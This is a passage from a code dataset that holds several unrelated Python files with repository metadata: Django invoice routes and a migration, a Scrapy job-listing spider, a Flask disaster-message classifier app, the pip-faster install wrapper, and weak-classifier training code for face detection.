\"negative\"),\n (\"This city is the best city on Earth!\", \"positive\"),\n (\"This city is the worst city on Earth!\", \"negative\"),\n (\"Этот город просто обычный город на Земле.\", \"neutral\"),\n (\"This city is just a typical city on Earth.\", \"neutral\"),\n ],\n)\ndef test_neural_net(text, expected_result):\n try:\n res = get_sentiment(text)\n except Exception:\n res = \"error\"\n\n assert res == expected_result\n","repo_name":"pavviaz/itmo_backend_course","sub_path":"hw_3/neural_engine/test_ml.py","file_name":"test_ml.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72887060004","text":"from django.conf.urls import url,include\nfrom . import views\n\napp_name = \"invoice\"\n\nupatterns = [\n url(r'^salesinvoice/(?P[0-9]+)$',views.UpdateSalesInvoice.as_view(),name='update-salesinvoice'),\n url(r'^salesreturninvoice/(?P[0-9]+)$',views.UpdateSalesReturnInvoice.as_view(),name='update-salesreturninvoice'),\n url(r'^purchasesinvoice/(?P[0-9]+)$',views.UpdatePurchaseInvoice.as_view(),name='update-purchasesinvoice'),\n url(r'^purchasesreturninvoice/(?P[0-9]+)$',views.UpdatePurchaseReturnInvoice.as_view(),name='update-purchasesreturninvoice'),\n]\n\ncpatterns = [\n url(r'^salesinvoice$',views.CreateSalesInvoice.as_view(),name='create-salesinvoice'),\n url(r'^salesreturninvoice$',views.CreateSalesReturnInvoice.as_view(),name='create-salesreturninvoice'),\n url(r'^purchasesinvoice$',views.CreatePurchaseInvoice.as_view(),name='create-purchasesinvoice'),\n url(r'^purchasesreturninvoice$',views.CreatePurchaseReturnInvoice.as_view(),name='create-purchasesreturninvoice'),\n]\n\nqpatterns = [\n url(r'^salesinvoices$',views.SalesInvoices.as_view(),name='salesinvoices'),\n url(r'^salesreturninvoices$',views.SalesReturnInvoices.as_view(),name='salesreturninvoices'),\n url(r'^purchasesinvoices$',views.PurchaseInvoices.as_view(),name='purchasesinvoices'),\n url(r'^purchasesreturninvoices$',views.PurchaseReturnInvoices.as_view(),name='purchasesreturninvoices'),\n]\n\nhpatterns = [\n url(r'^recall/sales$',views.RecallSalesInvoice.as_view()),\n url(r'^recall/purchases$',views.RecallPurchaseInvoice.as_view()),\n url(r'^recall/salesreturns$',views.RecallSalesReturnInvoice.as_view()),\n url(r'^recall/purchasesreturns$',views.RecallPurchaseReturnInvoice.as_view()),\n url(r'^void/purchasesinvoice$',views.VoidPurchaseInvoice.as_view()),\n url(r'^void/purchasesreturninvoice$',views.VoidPurchaseReturnInvoice.as_view()),\n url(r'^void/salesinvoice$',views.VoidSalesInvoice.as_view()),\n url(r'^void/salesreturninvoice$',views.VoidSalesReturnInvoice.as_view()),\n url(r'^pay/salesinvoice$',views.PaySalesInvoice.as_view()),\n url(r'^pay/purchasesinvoice$',views.PayPurchaseInvoice.as_view()),\n]\n\napiv1 = [\n url(r'^update/',include(upatterns)),\n url(r'^helpers/',include(hpatterns)),\n url(r'^create/',include(cpatterns)),\n url(r'^query/',include(qpatterns)),\n]\n\nurlpatterns = [\n url(r'^$',views.AppInit.as_view(),name=\"index\"),\n url(r'^apiv1/',include(apiv1)),\n]\n","repo_name":"baahkusi/caretaker","sub_path":"invoice/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"10466425358","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('official_account', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='SimulationMatch',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('openid', models.CharField(max_length=50, verbose_name='\\u7528\\u6237OpenID')),\n ('fakeid', models.CharField(max_length=50, verbose_name='\\u7528\\u6237FakeID')),\n ('official_account', models.ForeignKey(verbose_name='\\u6240\\u5c5e\\u516c\\u4f17\\u53f7', to='official_account.OfficialAccount')),\n ],\n options={\n 'db_table': 'simulation_match',\n 'verbose_name': '\\u6a21\\u62df\\u767b\\u9646\\u5173\\u7cfb\\u5bf9\\u5e94\\u8868',\n 'verbose_name_plural': '\\u6a21\\u62df\\u767b\\u9646\\u5173\\u7cfb\\u5bf9\\u5e94\\u8868',\n },\n bases=(models.Model,),\n ),\n ]\n","repo_name":"doraemonext/wechat-platform","sub_path":"wechat_platform/system/simulation/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"52"} +{"seq_id":"12637215009","text":"import scrapy\nfrom scrapy.http import HtmlResponse\nfrom items import JobparserItem\n\n\ndef vacancy_parse(response: HtmlResponse):\n company_name = response.xpath(\n \"//div[contains(@class, 'bloko-column_m-0 bloko-column_l-6')]//span[@data-qa='bloko-header-2']//text()\").getall()\n vacancies_name = response.xpath(\"//h1/text()\").get()\n salary = response.xpath(\"//div[@data-qa='vacancy-salary']//text()\").getall()\n url = response.url\n _id = response.url\n yield JobparserItem(company_name=company_name, vacancies_name=vacancies_name, salary=salary, url=url, _id=_id)\n\n\nclass HhRuSpider(scrapy.Spider):\n name = 'hh_ru'\n allowed_domains = ['hh.ru']\n\n start_urls = [\n 'https://krasnodar.hh.ru/vacancies/python-developer']\n\n def parse(self, response):\n next_page = response.xpath(\"//a[@data-qa='pager-next']/@href\").get()\n if next_page:\n yield response.follow(next_page, callback=self.parse)\n links = response.xpath(\"//a[@data-qa='serp-item__title']/@href\").getall()\n for link in links:\n yield response.follow(link, method='GET', callback=vacancy_parse)\n","repo_name":"nezl0i/gb_outside","sub_path":"5/jobparser/spiders/hh_ru.py","file_name":"hh_ru.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16389084445","text":"import sys\nimport os\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\nimport json\nimport plotly\nimport re\nimport pandas as pd\nimport numpy as np\nimport nltk\n\nfrom nltk.stem import WordNetLemmatizer\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\n\nfrom flask import Flask\nfrom flask import render_template, request, jsonify\nfrom plotly.graph_objs import Bar\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\nfrom nlp_utils import NLPUtils\n\nnltk.download('stopwords')\n\napp = Flask(__name__)\nnlpUtils = NLPUtils()\n\n# load model\nmodel = joblib.load(\"../models/classifier.pkl\")\nfeatures_corpus = pd.read_csv('../data/features_corpus.csv')\n# Dataset categories\ncolumns = ['related', 'request', 'offer',\n 'aid_related', 'medical_help', 'medical_products',\n 'search_and_rescue', 'security', 'military', 'child_alone', 'water',\n 'food', 'shelter', 'clothing', 'money', 'missing_people',\n 'refugees', 'death', 'other_aid', 'infrastructure_related',\n 'transport', 'buildings', 'electricity', 'tools', 'hospitals',\n 'shops', 'aid_centers', 'other_infrastructure', 'weather_related',\n 'floods', 'storm', 'fire', 'earthquake', 'cold', 'other_weather',\n 'direct_report', 'genre_direct', 'genre_news', 'genre_social']\n\n# CSS class icons for categories\ncategory_icons = {\n 'related':'exclamation-triangle', 'request':'hand-point-up', 'offer':'hand-holding-heart',\n 'aid_related':'first-aid', 'medical_help':'briefcase-medical', 'medical_products':'prescription-bottle-alt',\n 'search_and_rescue':'helicopter', 'security':'shield-alt', 'military':'exclamation-circle', 'child_alone':'child',\n 'water':'tint', 'food':'utensils', 'shelter':'home', 'clothing':'tshirt', 'money':'hand-holding-usd',\n 'missing_people':'user-minus', 'refugees':'user-friends', 'death':'user-times', 'other_aid':'hands-helping',\n 'infrastructure_related':'house-damage', 'transport':'bus-alt', 'buildings':'building', 'electricity':'bolt',\n 'tools':'tools', 'hospitals':'hospital', 'shops':'shopping-basket', 'aid_centers':'clinic-medical',\n 'other_infrastructure':'city', 'weather_related':'cloud-sun-rain',\n 'floods':'water', 'storm':'cloud-showers-heavy', 'fire':'burn', 'earthquake':'house-damage',\n 'cold':'icicles', 'other_weather':'cloud-sun',\n 'direct_report':'table', 'genre_direct':'mobile', 'genre_news':'newspaper', 'genre_social':'twitter'\n}\n\n# CSS class for category colors\ncategory_colors = {\n 'related':'primary', 'request':'info', 'offer':'success',\n 'aid_related':'danger', 'medical_help':'warning', 'medical_products':'info',\n 'search_and_rescue':'primary', 'security':'info', 'military':'success', 'child_alone':'danger',\n 'water':'warning', 'food':'info', 'shelter':'primary', 'clothing':'info', 'money':'success',\n 'missing_people':'danger', 'refugees':'warning', 'death':'info', 'other_aid':'primary',\n 'infrastructure_related':'info', 'transport':'success', 'buildings':'danger', 'electricity':'warning',\n 'tools':'info', 'hospitals':'primary', 'shops':'info', 'aid_centers':'success',\n 'other_infrastructure':'danger', 'weather_related':'warning',\n 'floods':'info', 'storm':'primary', 'fire':'info', 'earthquake':'success',\n 'cold':'danger', 'other_weather':'warning',\n 'direct_report':'info', 'genre_direct':'primary', 'genre_news':'info', 'genre_social':'success'\n}\n\n# Set random colors for category plots\nimport random as random\nbackgroundColors = []\nborderColors = []\nfor category in columns:\n r = random.randint(0, 255)\n g = random.randint(0, 255)\n b = random.randint(0, 255)\n backgroundColors.append( \"rgba({}, {}, {}, 0.2)\".format(r, g, b))\n borderColors.append( \"rgb({}, {}, {})\".format(r, g, b))\n\n# index webpage displays cool visuals and receives user input text for model\n@app.route('/')\n@app.route('/index')\ndef index():\n \"\"\"\n Results are shown in a table and a plot to show the predicted categories.\n \"\"\"\n query = request.args.get('query', '')\n classification_results = None\n categories = None\n categories_totals = None\n\n if(query != ''):\n # use model to predict classification for query\n query = pd.DataFrame([query], columns=['document'])\n print(f'query: {query}')\n query = nlpUtils.vectorize(query['document'], features_corpus)\n classification_labels = model.predict(query)[0]\n print(f'classification_labels: {classification_labels}')\n classification_results = dict(zip(columns, classification_labels))\n\n columns_df = ['message']\n columns_df.extend(columns)\n\n messages_df = pd.DataFrame(columns = columns_df)\n messages_df = messages_df.append(classification_results, ignore_index = True)\n\n categories, categories_totals = get_plot_params(messages_df, True)\n\n store_message(query, messages_df)\n return render_template(\n 'index.html',\n query=query,\n classification_result=classification_results,\n categories = categories,\n categories_totals = categories_totals,\n background_colors = backgroundColors,\n border_colors = borderColors\n )\n\ndef store_message(message, messages_df):\n \"\"\"Every query is stored in a table with the predicted categories. This can eventually allow users to\n manually make correction to classifications that can be used to expand the training set.\n\n Parameters\n ----------\n message: string\n Message to classify.\n\n messages_df: DataFrame\n Dataframe with the predicted categories for the message.\n \"\"\"\n engine = create_engine('sqlite:///ReceivedMessages.db')\n exists = 0\n try:\n messages = pd.read_sql_table('messages', engine)\n exists = messages.loc[messages['message'] == message].shape[0]\n except Exception as inst:\n print(\"Unexpected error:\", inst)\n pass\n if(exists == 0):\n messages_df.to_sql('messages', engine, index=False, if_exists='append')\n\ndef get_plot_params(messages, filter = False):\n \"\"\" Returns parameter values for build a chartjs plot\n\n Parameters\n ----------\n messages: DataFrame\n DataFrame with messages and their predicted categories.\n\n filter: bool\n If True, only returns categories with value 1.\n\n Returns\n -------\n categories: array\n Ids for predicted categories.\n categories_totals: array\n Total of records per categories.\n \"\"\"\n categories_df = messages.drop(['message'], axis = 1)\n totals = categories_df.sum()\n\n categories_totals_df = pd.DataFrame({'category':totals.index, 'total':totals.values})\n if(filter == True):\n categories_totals_df = categories_totals_df.loc[categories_totals_df['total'] > 0]\n categories = list(categories_totals_df['category'].values)\n categories_totals = list(categories_totals_df['total'].values)\n return categories, categories_totals\n\ndef get_top_categories(messages, top):\n \"\"\" Return the most required categories\n\n Parameters\n ----------\n messages: DataFrame\n DataFrame with messages and their predicted categories.\n\n top: int\n Number of categories to retrieve.\n\n Returns\n -------\n categories_totals_df: DataFrame\n Dataframe with the most required categories.\n \"\"\"\n categories_df = messages.drop(['message'], axis = 1)\n totals = categories_df.sum()\n\n categories_totals_df = pd.DataFrame({'category':totals.index, 'total':totals.values})\n return categories_totals_df.sort_values(by=['total'], ascending = False).head(n = top)\n\n@app.route('/dashboard')\ndef dashboard():\n \"\"\"\n This page provides basic plotting information from the messages received and their classifications.\n \"\"\"\n engine = create_engine('sqlite:///ReceivedMessages.db')\n categories_top_df = pd.DataFrame()\n categories_totals_df = pd.DataFrame()\n categories = None\n categories_totals = None\n\n try:\n received_messages = pd.read_sql_table('messages', engine)\n categories, categories_totals = get_plot_params(received_messages)\n categories_top_df = get_top_categories(received_messages, 4)\n\n except:\n print(\"Unexpected error:\", sys.exc_info()[0])\n pass\n return render_template(\n 'dashboard.html',\n categories_top_df = categories_top_df,\n category_icons = category_icons,\n category_colors = category_colors,\n categories = categories,\n categories_totals = categories_totals,\n background_colors = backgroundColors,\n border_colors = borderColors\n )\n\n@app.route('/dataset')\ndef dataset():\n return render_template(\n 'dataset.html'\n )\n\n\ndef main():\n app.run(host='0.0.0.0', port=3001, debug=True)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"mrugeles/Disaster-Response-Pipeline","sub_path":"app/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":8855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42805384867","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''pip-faster is a thin wrapper around pip.\n\nIt only adds a --prune option to the `install` subcommand.\n`pip-faster install --prune` will *uninstall* any installed packages that are\nnot required.\n\nOtherwise, you should find that pip-faster gives the same results as pip, just\nmore quickly, especially in the case of pinned requirements (e.g.\npackage-x==1.2.3).\n\nVersion control at: https://github.com/yelp/venv-update\n'''\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport errno\nimport glob\nimport os\nimport random\nimport re\nimport shutil\nimport sys\nfrom contextlib import contextmanager\n\nimport pip as pipmodule\nfrom pip._internal import logger\nfrom pip._internal.commands.install import InstallCommand\nfrom pip._internal.exceptions import DistributionNotFound\nfrom pip._internal.exceptions import InstallationError\nfrom pip._internal.index import BestVersionAlreadyInstalled\nfrom pip._internal.index import HTMLPage\nfrom pip._internal.index import Link\nfrom pip._internal.index import PackageFinder\nfrom pip._internal.req import InstallRequirement\nfrom pip._internal.wheel import Wheel\n\nfrom venv_update import colorize\nfrom venv_update import raise_on_failure\nfrom venv_update import timid_relpath\nfrom venv_update import user_cache_dir\n\n# Debian de-vendorizes the version of pip it ships\ntry: # :pragma:nocover: non-debian\n from pip._vendor import pkg_resources\nexcept ImportError: # :pragma:nocover: debian\n import pkg_resources\n\ntry: # :pragma:nocover: pip>=18.1\n from pip._internal.req.constructors import install_req_from_line\nexcept ImportError: # :pragma:nocover: pip<18.1\n install_req_from_line = InstallRequirement.from_line\n\n# Thanks six!\nPY2 = str is bytes\nif PY2: # :pragma:nocover:\n _reraise_src = 'def reraise(tp, value, tb=None): raise tp, value, tb'\n exec(_reraise_src)\nelse: # :pragma:nocover:\n def reraise(tp, value, tb=None):\n if value is None:\n value = tp()\n if value.__traceback__ is not tb:\n raise value.with_traceback(tb)\n raise value\n\n\nclass CACHE(object):\n _cache_dir = user_cache_dir()\n wheelhouse = os.path.join(_cache_dir, 'pip-faster', 'wheelhouse')\n pip_wheelhouse = os.path.join(_cache_dir, 'pip', 'wheels')\n\n\ndef ignorecase_glob(glob):\n return ''.join([\n '[{}{}]'.format(char.lower(), char.upper())\n if char.isalpha() else char\n for char in glob\n ])\n\n\ndef optimistic_wheel_search(req, index_urls):\n name = req.name.replace('-', '_').lower()\n\n for index_url in index_urls:\n expected_location = os.path.join(\n CACHE.wheelhouse, index_url, ignorecase_glob(name) + '-*.whl',\n )\n for link in glob.glob(expected_location):\n link = Link('file:' + link)\n wheel = Wheel(link.filename)\n if req.specifier.contains(wheel.version) and wheel.supported():\n return link\n\n\ndef is_req_pinned(requirement):\n if not requirement:\n # url-style requirement\n return False\n\n for spec in requirement.specifier:\n if spec.operator == '==' and not spec.version.endswith('.*'):\n return True\n return False\n\n\nclass FasterPackageFinder(PackageFinder):\n\n def find_requirement(self, req, upgrade):\n if is_req_pinned(req.req):\n # if the version is pinned-down by a ==\n # first try to use any installed package that satisfies the req\n if req.satisfied_by:\n logger.info('Faster! pinned requirement already installed.')\n raise BestVersionAlreadyInstalled\n\n # then try an optimistic search for a .whl file:\n link = optimistic_wheel_search(req.req, self.index_urls)\n if link is None:\n # The wheel will be built during prepare_files\n logger.debug('No wheel found locally for pinned requirement %s', req)\n else:\n logger.info('Faster! Pinned wheel found, without hitting PyPI.')\n return link\n else:\n # unpinned requirements aren't very notable. only show with -v\n logger.info('slow: full search for unpinned requirement %s', req)\n\n # otherwise, do the full network search, per usual\n try:\n return super(FasterPackageFinder, self).find_requirement(req, upgrade)\n except DistributionNotFound:\n exc_info = sys.exc_info()\n # Best effort: try and install from suitable version on-disk\n link = optimistic_wheel_search(req.req, self.index_urls)\n if link:\n return link\n else:\n reraise(*exc_info)\n\n\ndef _can_be_cached(package):\n return (\n package.is_wheel and\n # An assertion that we're looking in the pip wheel dir\n package.link.path.startswith(CACHE.pip_wheelhouse)\n )\n\n\ndef mkdirp(pth):\n try:\n os.makedirs(pth)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\n\ndef _store_wheel_in_cache(file_path, index_url):\n filename = os.path.basename(file_path)\n cache = os.path.join(CACHE.wheelhouse, index_url, filename)\n cache_tmp = '{}.{}'.format(cache, random.randint(0, sys.maxsize))\n cache_dir = os.path.dirname(cache)\n mkdirp(cache_dir)\n # Atomicity\n shutil.copy(file_path, cache_tmp)\n os.rename(cache_tmp, cache)\n\n\ndef cache_installed_wheels(index_url, installed_packages):\n \"\"\"After installation, pip tells us what it installed and from where.\n\n We build a structure that looks like\n\n .cache/pip-faster/wheelhouse/$index_url/$wheel\n \"\"\"\n for installed_package in installed_packages:\n if not _can_be_cached(installed_package):\n continue\n _store_wheel_in_cache(installed_package.link.path, index_url)\n\n\ndef get_patched_download_http_url(orig_download_http_url, index_urls):\n def pipfaster_download_http_url(link, *args, **kwargs):\n file_path, content_type = orig_download_http_url(link, *args, **kwargs)\n if link.is_wheel:\n for index_url in index_urls:\n if (\n # pip <18.1\n isinstance(link.comes_from, HTMLPage) and\n link.comes_from.url.startswith(index_url)\n ) or (\n # pip >= 18.1\n isinstance(link.comes_from, (str, type(''))) and\n link.comes_from.startswith(index_url)\n ):\n _store_wheel_in_cache(file_path, index_url)\n break\n return file_path, content_type\n return pipfaster_download_http_url\n\n\ndef pip(args):\n \"\"\"Run pip, in-process.\"\"\"\n from sys import stdout\n stdout.write(colorize(('pip',) + args))\n stdout.write('\\n')\n stdout.flush()\n\n return pipmodule._internal.main(list(args))\n\n\ndef dist_to_req(dist):\n \"\"\"Make a pip.FrozenRequirement from a pkg_resources distribution object\"\"\"\n try: # :pragma:nocover: (pip>=10)\n from pip._internal.operations.freeze import FrozenRequirement\n except ImportError: # :pragma:nocover: (pip<10)\n from pip import FrozenRequirement\n\n # normalize the casing, dashes in the req name\n orig_name, dist.project_name = dist.project_name, dist.key\n result = FrozenRequirement.from_dist(dist, [])\n # put things back the way we found it.\n dist.project_name = orig_name\n\n return result\n\n\ndef pip_get_installed():\n \"\"\"Code extracted from the middle of the pip freeze command.\n FIXME: does not list anything installed via -e\n \"\"\"\n from pip._internal.utils.misc import dist_is_local\n\n return tuple(\n dist_to_req(dist)\n for dist in fresh_working_set()\n if dist_is_local(dist)\n if dist.key != 'python' # See #220\n )\n\n\ndef normalize_name(name):\n \"\"\"Normalize a python package name a la PEP 503\"\"\"\n # https://www.python.org/dev/peps/pep-0503/#normalized-names\n return re.sub('[-_.]+', '-', name).lower()\n\n\ndef fresh_working_set():\n \"\"\"return a pkg_resources \"working set\", representing the *currently* installed packages\"\"\"\n class WorkingSetPlusEditableInstalls(pkg_resources.WorkingSet):\n\n def __init__(self, *args, **kwargs):\n self._normalized_name_mapping = {}\n super(WorkingSetPlusEditableInstalls, self).__init__(*args, **kwargs)\n\n def add_entry(self, entry):\n \"\"\"Same as the original .add_entry, but sets only=False, so that egg-links are honored.\"\"\"\n logger.debug('working-set entry: %r', entry)\n self.entry_keys.setdefault(entry, [])\n self.entries.append(entry)\n for dist in pkg_resources.find_distributions(entry, False):\n\n # eggs override anything that's installed normally\n # fun fact: pkg_resources.working_set's results depend on the\n # ordering of os.listdir since the order of os.listdir is\n # entirely arbitrary (an implemenation detail of file system),\n # without calling site.main(), an .egg-link file may or may not\n # be honored, depending on the filesystem\n replace = (dist.precedence == pkg_resources.EGG_DIST)\n self._normalized_name_mapping[normalize_name(dist.key)] = dist.key\n self.add(dist, entry, False, replace=replace)\n\n def find_normalized(self, req):\n req = _package_req_to_pkg_resources_req(str(req))\n req.key = self._normalized_name_mapping.get(normalize_name(req.key), req.key)\n return self.find(req)\n\n return WorkingSetPlusEditableInstalls()\n\n\ndef req_cycle(req):\n \"\"\"is this requirement cyclic?\"\"\"\n cls = req.__class__\n seen = {req.name}\n while isinstance(req.comes_from, cls):\n req = req.comes_from\n if req.name in seen:\n return True\n else:\n seen.add(req.name)\n return False\n\n\ndef pretty_req(req):\n \"\"\"\n return a copy of a pip requirement that is a bit more readable,\n at the expense of removing some of its data\n \"\"\"\n from copy import copy\n req = copy(req)\n req.link = None\n req.satisfied_by = None\n return req\n\n\ndef _package_req_to_pkg_resources_req(req):\n return pkg_resources.Requirement.parse(str(req))\n\n\ndef trace_requirements(requirements):\n \"\"\"given an iterable of pip InstallRequirements,\n return the set of required packages, given their transitive requirements.\n \"\"\"\n requirements = tuple(pretty_req(r) for r in requirements)\n working_set = fresh_working_set()\n\n # breadth-first traversal:\n from collections import deque\n queue = deque(requirements)\n queued = {_package_req_to_pkg_resources_req(req.req) for req in queue}\n errors = []\n result = []\n while queue:\n req = queue.popleft()\n\n logger.debug('tracing: %s', req)\n try:\n dist = working_set.find_normalized(_package_req_to_pkg_resources_req(req.req))\n except pkg_resources.VersionConflict as conflict:\n dist = conflict.args[0]\n errors.append('Error: version conflict: {} ({}) <-> {}'.format(\n dist, timid_relpath(dist.location), req\n ))\n\n assert dist is not None, 'Should be unreachable in pip8+'\n result.append(dist_to_req(dist))\n\n # TODO: pip does no validation of extras. should we?\n extras = [extra for extra in req.extras if extra in dist.extras]\n for sub_req in sorted(dist.requires(extras=extras), key=lambda req: req.key):\n sub_req = InstallRequirement(sub_req, req)\n\n if req_cycle(sub_req):\n logger.warning('Circular dependency! %s', sub_req)\n continue\n elif sub_req.req in queued:\n logger.debug('already queued: %s', sub_req)\n continue\n else:\n logger.debug('adding sub-requirement %s', sub_req)\n queue.append(sub_req)\n queued.add(sub_req.req)\n\n if errors:\n raise InstallationError('\\n'.join(errors))\n\n return result\n\n\ndef reqnames(reqs):\n return {req.name for req in reqs}\n\n\nclass FasterInstallCommand(InstallCommand):\n\n def __init__(self, *args, **kw):\n super(FasterInstallCommand, self).__init__(*args, **kw)\n\n cmd_opts = self.cmd_opts\n cmd_opts.add_option(\n '--prune',\n action='store_true',\n dest='prune',\n default=False,\n help='Uninstall any non-required packages.',\n )\n\n cmd_opts.add_option(\n '--no-prune',\n action='store_false',\n dest='prune',\n help='Do not uninstall any non-required packages.',\n )\n\n def run(self, options, args):\n \"\"\"update install options with caching values\"\"\"\n if options.prune:\n previously_installed = pip_get_installed()\n\n index_urls = [options.index_url] + options.extra_index_urls\n with pipfaster_download_cacher(index_urls):\n requirement_set = super(FasterInstallCommand, self).run(\n options, args,\n )\n\n required = requirement_set.requirements.values()\n\n # With extra_index_urls we don't know where the wheel is from\n if not options.extra_index_urls:\n cache_installed_wheels(options.index_url, requirement_set.successfully_downloaded)\n\n if not options.ignore_dependencies:\n # transitive requirements, previously installed, are also required\n # this has a side-effect of finding any missing / conflicting requirements\n required = trace_requirements(required)\n\n if not options.prune:\n return requirement_set\n\n extraneous = (\n reqnames(previously_installed) -\n reqnames(required) -\n # the stage1 bootstrap packages\n reqnames(trace_requirements([install_req_from_line('venv-update')])) -\n # See #186\n frozenset(('pkg-resources',))\n )\n\n if extraneous:\n extraneous = sorted(extraneous)\n pip(('uninstall', '--yes') + tuple(extraneous))\n\n # TODO: Cleanup: remove stale values from the cache and wheelhouse that have not been accessed in a week.\n\n# TODO: a pip_faster.patch module\n\n\ndef patch(attrs, updates):\n \"\"\"Perform a set of updates to a attribute dictionary, return the original values.\"\"\"\n orig = {}\n for attr, value in updates:\n orig[attr] = attrs[attr]\n attrs[attr] = value\n return orig\n\n\n@contextmanager\ndef patched(attrs, updates):\n \"\"\"A context in which some attributes temporarily have a modified value.\"\"\"\n orig = patch(attrs, updates.items())\n try:\n yield orig\n finally:\n patch(attrs, orig.items())\n# END: pip_faster.patch module\n\n\ndef pipfaster_install_prune_option():\n return patched(pipmodule._internal.commands.commands_dict, {FasterInstallCommand.name: FasterInstallCommand})\n\n\ndef pipfaster_packagefinder():\n \"\"\"Provide a short-circuited search when the requirement is pinned and appears on disk.\n\n Suggested upstream at: https://github.com/pypa/pip/pull/2114\n \"\"\"\n # A poor man's dependency injection: monkeypatch :(\n try: # :pragma:nocover: pip>=18.1\n from pip._internal.cli import base_command\n except ImportError: # :pragma:nocover: pip<18.1\n from pip._internal import basecommand as base_command\n return patched(vars(base_command), {'PackageFinder': FasterPackageFinder})\n\n\ndef pipfaster_download_cacher(index_urls):\n \"\"\"vanilla pip stores a cache of the http session in its cache and not the\n wheel files. We intercept the download and save those files into our\n cache\n \"\"\"\n from pip._internal import download\n orig = download._download_http_url\n patched_fn = get_patched_download_http_url(orig, index_urls)\n return patched(vars(download), {'_download_http_url': patched_fn})\n\n\ndef main():\n with pipfaster_install_prune_option():\n with pipfaster_packagefinder():\n raise_on_failure(pipmodule._internal.main)\n\n\nif __name__ == '__main__':\n exit(main())\n","repo_name":"Yelp/venv-update","sub_path":"pip_faster.py","file_name":"pip_faster.py","file_ext":"py","file_size_in_byte":16309,"program_lang":"python","lang":"en","doc_type":"code","stars":177,"dataset":"github-code","pt":"52"} +{"seq_id":"74444151845","text":"\nimport numpy as np\n\n\ndef train_weak_classifiers(data,labels):\n \"\"\"\n Trains weak classifiers. \n ---------\n Arguments\n ---------\n data [np.array]: Numpy array of shape (m,162336)\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n -------\n Returns\n -------\n theta_vector [np.array]: Numpy array of shape (162336,) denoting thresholds\n parity_vector [np.array]: Numpy array of shape (162336,) with (1,-1) denoting sign of inequality\n \"\"\"\n num_samples, num_features = data.shape\n theta_vector = np.zeros((num_features,))\n parity_vector = np.zeros((num_features,))\n for feat_id in range(num_features):\n features = data[:,feat_id]\n indices = features.argsort()\n labels_sorted = labels[indices]\n num_corrects = np.zeros((2,num_samples))\n for t in range(num_samples):\n num_corrects[0,t] = t-labels_sorted[:t].sum()+labels_sorted[t:].sum()\n num_corrects[1,t] = num_samples - num_corrects[0,t]\n idx = num_corrects.argmax()\n parity = idx//num_samples\n theta = features[indices][idx%num_samples]\n theta_vector[feat_id] = theta\n parity_vector[feat_id] = parity\n # if feat_id==50:\n # break\n parity_vector = 1-parity_vector\n parity_vector[parity_vector==0] = -1\n return theta_vector, parity_vector\n\ndef predict(feature_vec,theta,parity):\n \"\"\"\n Returns predictions for m samples with a specific feature.\n ---------\n Arguments\n ---------\n feature_vec [np.array]: Numpy array of shape (m,) denoting a particular feature of m samples\n theta [float]: Threshold\n parity [parity]: Sign of inequality\n -------\n Returns\n -------\n pred [np.array]: Numpy array of shape (m,) denoting predictions of m samples in (1,-1) notation\n \"\"\"\n return parity*np.sign(feature_vec-theta)\n\ndef predict_full_data(data,theta_vec,parity_vec, majority_label=0):\n \"\"\"\n Returns predictions for m samples with multiple features. Each sample x feature combination has a prediction\n ---------\n Arguments\n ---------\n data [np.array]: Numpy array of shape (m,162336)\n theta_vec [np.array]: Numpy array of shape (162336,) denoting thresholds\n parity_vec [np.array]: Numpy array of shape (162336,) with (1,-1) denoting sign of inequality\n majority_label [int]: Majority label. In case feature==threshold, majority label is assigned\n -------\n Returns\n -------\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n \"\"\"\n num_samples, num_features = data.shape\n preds = np.zeros((num_samples,num_features))\n for feat_id in range(num_features):\n feature_vec = data[:,feat_id]\n preds[:,feat_id] = predict(feature_vec,theta_vec[feat_id],parity_vec[feat_id])\n # if feat_id==50:\n # break\n preds[preds==0] = majority_label\n preds[preds==-1] = 0\n preds = preds.astype(int)\n return preds\n\ndef accumulate_accs(labels,preds):\n \"\"\"\n Measure performance of weak classifiers\n ---------\n Arguments\n ---------\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n -------\n Returns\n -------\n accs [np.array]: Numpy array of shape (162336,) denoting accuracies of all features\n \"\"\"\n num_samples, num_features = preds.shape\n accs = np.zeros((num_features,))\n for feat_id in range(num_features):\n preds_vec = preds[:,feat_id]\n assert labels.shape == preds_vec.shape\n acc = (labels==preds_vec).sum()/num_samples\n accs[feat_id] = acc\n return accs\n\n\ndef print_accs(labels,preds):\n \"\"\"\n Prints performance of weak classifiers\n ---------\n Arguments\n ---------\n labels [np.array]: Numpy array of shape (m,) with ones for faces and zeros for non-faces\n preds [np.array]: Numpy array of shape (m,162336) denoting predictions in (1,0) notation\n -------\n Returns\n -------\n None\n \"\"\"\n labels[labels==0] = -1\n num_samples, num_features = preds.shape\n for feat_id in range(num_features):\n preds_vec = preds[:,feat_id]\n assert labels.shape == preds_vec.shape\n acc = 